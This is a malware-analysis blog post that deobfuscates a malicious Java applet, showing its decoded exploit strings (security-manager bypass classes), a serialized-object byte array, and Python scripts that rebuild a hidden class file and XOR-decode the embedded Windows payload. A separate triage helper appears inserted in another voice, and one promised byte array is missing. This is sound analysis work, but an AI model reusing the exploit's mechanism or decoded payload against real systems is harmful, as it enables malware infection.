Malicious Java Applet Deobfuscation

On Sunday (13th January 2013), I received an email from @it4sec about a malicious Java applet that he had received. I decided to write about it, since Java applets seem to be a common delivery mechanism for exploit kits recently.

Recon Stage

Since a .jar file is basically a sort of “container”, let’s use 7zip to look at its structure and what it contains.

Structure of ycegyashypda-a.lmrjcuwbkbfxm.jar

Structure of Package A

As we can see from the above images, there is another file, nlfokjpqhpnjflnd, at the same level as Package A. It could be a resource, or the actual malware itself. But first let’s fire up Java Decompiler and decompile this .jar file.

Decompiled using Java Decompiler

Whoa, judging from the above screenshot, the JApplet is heavily obfuscated. When you launch the JVM you specify a class to run, and it is the main() of that class where your program starts. However, that is only true for normal Java applications. To get a clearer picture of how a JApplet works, it is better to explain the difference in entry points between a Java Application, a JApplet and a Java Thread:

  • Java Application – main()
  • JApplet – init()
  • Java Thread Start – run()

From the above, we can see that we need to search for init() within this .jar file. So let’s do a search with Java Decompiler; you should get back the same result as shown in the image below.

Search for init()

So 2 java class files, ruqwqctigjeifejeioao & lmrjcuwbkbfxm, contain the init() function. If we open the 2 class files, we’ll realize that the init() in ruqwqctigjeifejeioao is empty and lmrjcuwbkbfxm is the one starting the JApplet. But as I’ve mentioned earlier, this JApplet is heavily obfuscated. So how do we proceed? One thing I’ve noticed about most Java obfuscators is that they insert a lot of junk code. So what I usually do is search for each function name. For the sake of simplicity, I did a search on “uarjiavwfxhrtqiy” and I only got 1 hit, that is the declaration of the function itself. What this probably means is that nothing calls this function and it’s probably junk code. After you have removed the junk code, you will effectively have a much more readable obfuscated .jar file. :P

Analysis of the XOR functions

Eventually you should have something like this zip file. As I was removing the junk code, one of the class files that caught my eye was ruqwqctigjeifejeioao. It comprises 3 XOR functions. Let’s take a look at the zgdvbqcbnsyfifz function first.

1st XOR Function

As we can see from the above image, it uses 3 functions, equjlmvrymasjuy.xedrxvjygqwynzp, khppdrajqtvx.deftwubxwijud and lbqmiajqnkzzvfegy.ebppnwqzhuinwehxnhso, before assigning the result to a string array, oatgwfhyasuxgrhxgup. So let’s try to understand what equjlmvrymasjuy.xedrxvjygqwynzp does:

public static String[] xedrxvjygqwynzp(String paramString1, String paramString2) {
        return paramString1.split(paramString2);
}

As we can see, xedrxvjygqwynzp is basically doing a string split on paramString1 using paramString2 as the delimiter. Let’s rename the function and the variables, and you should have something similar to this:

public static String[] StringSplit(String szInputString, String szDelimiter) {
        return szInputString.split(szDelimiter);
}

Now let’s move on to khppdrajqtvx.deftwubxwijud:

public static String deftwubxwijud(byte[] paramArrayOfByte) {
        return new String(paramArrayOfByte);
}

As we can see from the above code snippet, it’s basically doing a byte-array-to-String conversion. So let’s rename the function:

public static String Byte2String(byte[] paramArrayOfByte) {
        return new String(paramArrayOfByte);
}

Lastly, we will take a look at lbqmiajqnkzzvfegy.ebppnwqzhuinwehxnhso:

public static String ebppnwqzhuinwehxnhso() {
        return rlfcwveaurpxojwdymq.agzcxgdeagqpu();
}

Oh great, it’s calling another function in another class. Let’s take a look at rlfcwveaurpxojwdymq.agzcxgdeagqpu before coming back to this one:

public static String agzcxgdeagqpu() {
        char[] arrayOfChar = new char[2];

        arrayOfChar[0] = '\\';
        arrayOfChar[1] = ';';

        return new String(arrayOfChar);
}

So this is just returning a String made up of ‘\’ and ‘;’, i.e. the delimiter “\;”. Let’s rename this function, agzcxgdeagqpu, as:

public static String szReturningBackSlashAndSemiColon() {
        char[] arrayOfChar = new char[2];

        arrayOfChar[0] = '\\';
        arrayOfChar[1] = ';';

        return new String(arrayOfChar);
}

And rename ebppnwqzhuinwehxnhso as follows:

public static String szReturningBackSlashAndSemiColonFromAnotherClass(){
        return rlfcwveaurpxojwdymq.szReturningBackSlashAndSemiColon();
}

Now, after renaming all the functions, let’s take a second look at zgdvbqcbnsyfifz:

oatgwfhyasuxgrhxgup = equjlmvrymasjuy.xedrxvjygqwynzp(khppdrajqtvx.deftwubxwijud(arrayOfByte1), lbqmiajqnkzzvfegy.ebppnwqzhuinwehxnhso());

is giving us a deobfuscated string:

szDeObfuscatedString = StringSplit(Byte2String(arrayOfByte1), szReturningBackSlashAndSemiColonFromAnotherClass());

If we write a Java file with the analyzed XOR function in it and run it, we get the following String array:

stringArray[0] = "java.security.AllPermission";
stringArray[1] = "file://";
stringArray[2] = "a.Time";
stringArray[3] = "getDeclaredConstructors";
stringArray[4] = "newInstance";
stringArray[5] = "go";
stringArray[6] = "ycegyashypda";
stringArray[7] = "/nlfokjpqhpnjflnd";
stringArray[8] = "java.util.concurrent.atomic.AtomicReferenceArray";
stringArray[9] = "set";
stringArray[10] = "setSecurityManager";
stringArray[11] = "forName";
stringArray[12] = "sun.awt.SunToolkit";
stringArray[13] = "getField";
stringArray[14] = "acc";
stringArray[15] = "com.sun.org.glassfish.gmbal.util.GenericConstructor";
stringArray[16] = "com.sun.org.glassfish.gmbal.ManagedObjectManagerFactory";
stringArray[17] = "sun.invoke.anon.AnonymousClassLoader";
stringArray[18] = "loadClass";

Note that index 7 contains the filename of the file which sits at the same level as Package A. We’ll come back to this later on; now let’s take a look at the 2nd XOR function.

2nd XOR Function

If we write a Java file and place this XOR function in it, we get the following byte array:

array[] = { AC, ED, 00, 05, 75, 72, 00, 13, 5B, 4C, 6A, 61, 76, 
61, 2E, 6C, 61, 6E, 67, 2E, 4F, 62, 6A, 65, 63, 74, 3B, 90, CE, 
58, 9F, 10, 73, 29, 6C, 02, 00, 00, 78, 70, 00, 00, 00, 02, 75, 
72, 00, 09, 5B, 4C, 61, 2E, 68, 6B, 7A, 6E, 3B, FE, 2C, 94, 11, 
88, B6, E5, FF, 02, 00, 00, 78, 70, 00, 00, 00, 01, 70, 73, 72, 
00, 30, 6A, 61, 76, 61, 2E, 75, 74, 69, 6C, 2E, 63, 6F, 6E, 63, 
75, 72, 72, 65, 6E, 74, 2E, 61, 74, 6F, 6D, 69, 63, 2E, 41, 74, 
6F, 6D, 69, 63, 52, 65, 66, 65, 72, 65, 6E, 63, 65, 41, 72, 72, 
61, 79, A9, D2, DE, A1, BE, 65, 60, 0C, 02, 00, 01, 5B, 00, 05, 
61, 72, 72, 61, 79, 74, 00, 13, 5B, 4C, 6A, 61, 76, 61, 2F, 6C, 
61, 6E, 67, 2F, 4F, 62, 6A, 65, 63, 74, 3B, 78, 70, 71, 00, 7E, 
00, 03 };

If you are familiar with file headers, you will realize that AC ED means that this is “Java serialization data”, and this byte array is used in the init function. Now let’s move on to the 3rd XOR function.

3rd XOR Function

If we write a Java file and place this XOR function in it, we get the following byte array:


Again, if you are familiar with file headers, you will realize that CA FE BA BE is the header of a Java bytecode file (.class).

Rebuilding the .class file

So let’s extract these bytes and write them to a file as one line of hex digits. Then let’s convert this array back to a .class file and use Java Decompiler later to decompile it. We can create the .class file using the python script below.

import binascii, sys

def main(szFileName):
    # the input file holds the class bytes as a single line of hex digits
    # (no commas or spaces)
    with open(szFileName, "rb") as hFile:
        szBytes = hFile.readlines()
    # strip the trailing newline, otherwise a2b_hex rejects the non-hex character
    hb = binascii.a2b_hex(szBytes[0].strip())
    with open("payload.class", "wb") as hFileOut:
        hFileOut.write(hb)

if __name__ == "__main__":
    # sys.argv[0] is the script itself, so a filename means at least 2 entries
    if len(sys.argv) < 2:
        print("Please enter a filename!")
        exit(0)
    main(sys.argv[1])

After running it you should get back something like this:

Payload XORing

Extracting the Malware File

As I’ve mentioned earlier, a Java Thread starts with a run() function, and in it we can see that it’s trying to XOR nlfokjpqhpnjflnd, the payload, with the following XOR keys: -55, -53, -61, -94, -111, and eventually output an .exe file. So what I did was to write this simple python script to XOR nlfokjpqhpnjflnd with this set of XOR keys, -55, -53, -61, -94, -111. As the XOR keys are negative (Java bytes are signed), all I did was convert them to the equivalent unsigned byte values: 201, 203, 195, 162, 145. This python script will save the result into an exe, which is the final malware.

import sys

def main(szFileName):
    with open(szFileName, "rb") as hFile:
        payload = bytearray(hFile.read())
    # Java's signed keys -55, -53, -61, -94, -111 as unsigned bytes (k & 0xFF)
    keys = [ 201, 203, 195, 162, 145 ]
    # cycle through the 5 keys, one key per payload byte
    for j in range(len(payload)):
        payload[j] ^= keys[j % len(keys)]
    # write with a harmless extension so the result is not run by accident
    with open("payload._exe_", "wb") as hFileOut:
        hFileOut.write(payload)

if __name__ == "__main__":
    # sys.argv[0] is the script itself, so a filename means at least 2 entries
    if len(sys.argv) < 2:
        print("Please enter a filename!")
        exit(0)
    main(sys.argv[1])
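As an added example (my own helper, not one of the post’s scripts), the following generalizes the two decoding steps above: it parses a hex dump in the post’s `array[] = { CA, FE, ... };` style, converts the signed Java XOR keys to unsigned bytes, XOR-decodes a blob with a cycling key, and identifies the result by its magic bytes (CA FE BA BE, AC ED 00 05, MZ). The `SAMPLE_PLAIN` stub is constructed here for demonstration and is not the real nlfokjpqhpnjflnd payload.

```python
import re
import struct
import sys

# The post's XOR keys exactly as they appear in the decompiled Java (signed bytes).
JAVA_KEYS = [-55, -53, -61, -94, -111]

# Magic numbers discussed in the post, plus the PE header the final payload should carry.
MAGICS = [
    (b"\xCA\xFE\xBA\xBE", "Java class file"),
    (b"\xAC\xED\x00\x05", "Java serialization stream"),
    (b"PK\x03\x04", "ZIP/JAR archive"),
    (b"MZ", "Windows PE executable"),
]


def java_bytes_to_unsigned(keys):
    """Java byte literals are signed; -55 & 0xFF == 201 (same as adding 256)."""
    return [k & 0xFF for k in keys]


def xor_with_cycling_key(data, keys):
    """XOR every byte with keys[i % len(keys)]; XOR is its own inverse."""
    ukeys = java_bytes_to_unsigned(keys)
    return bytes(b ^ ukeys[i % len(ukeys)] for i, b in enumerate(data))


def identify(data):
    """Name the file type from its leading bytes, or 'unknown'."""
    for magic, name in MAGICS:
        if data.startswith(magic):
            return name
    return "unknown"


def hex_dump_to_bytes(text):
    """Parse a dump in the 'array[] = { CA, FE, BA, BE, ... };' style into bytes."""
    body = text.split("{", 1)[1] if "{" in text else text
    body = body.split("}", 1)[0]
    return bytes(int(tok, 16) for tok in re.findall(r"[0-9A-Fa-f]{2}", body))


def class_file_version(data):
    """(major, minor) from a class file header; major 0x31 = 49 (big-endian)."""
    if not data.startswith(b"\xCA\xFE\xBA\xBE"):
        raise ValueError("not a Java class file")
    minor, major = struct.unpack(">HH", data[4:8])
    return major, minor


def decode_payload(data, keys=JAVA_KEYS):
    """Decode an XOR-encoded blob and report what it turned into."""
    plain = xor_with_cycling_key(data, keys)
    return plain, identify(plain)


# Constructed sample (not the real payload): a tiny PE-looking stub encoded the
# same way the applet encodes nlfokjpqhpnjflnd.
SAMPLE_PLAIN = b"MZ\x90\x00\x03\x00\x00\x00This program cannot be run in DOS mode."
SAMPLE_ENCODED = xor_with_cycling_key(SAMPLE_PLAIN, JAVA_KEYS)

if __name__ == "__main__":
    # Usage: python xor_triage.py <encoded file>   (keys default to the post's)
    with open(sys.argv[1], "rb") as fh:
        decoded, kind = decode_payload(fh.read())
    print("decoded as:", kind)
```

Because XOR is its own inverse, the same function that decodes the payload also lets you re-encode a known-good sample to confirm the key order you recovered from the decompiled run() method.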

If you view it with a hex editor or Notepad++, you should see something like this:

Final Payload

Now that you have the final malicious .exe, it’s time for you to start reversing it. :P Have Phun.

BR,

gunther_ar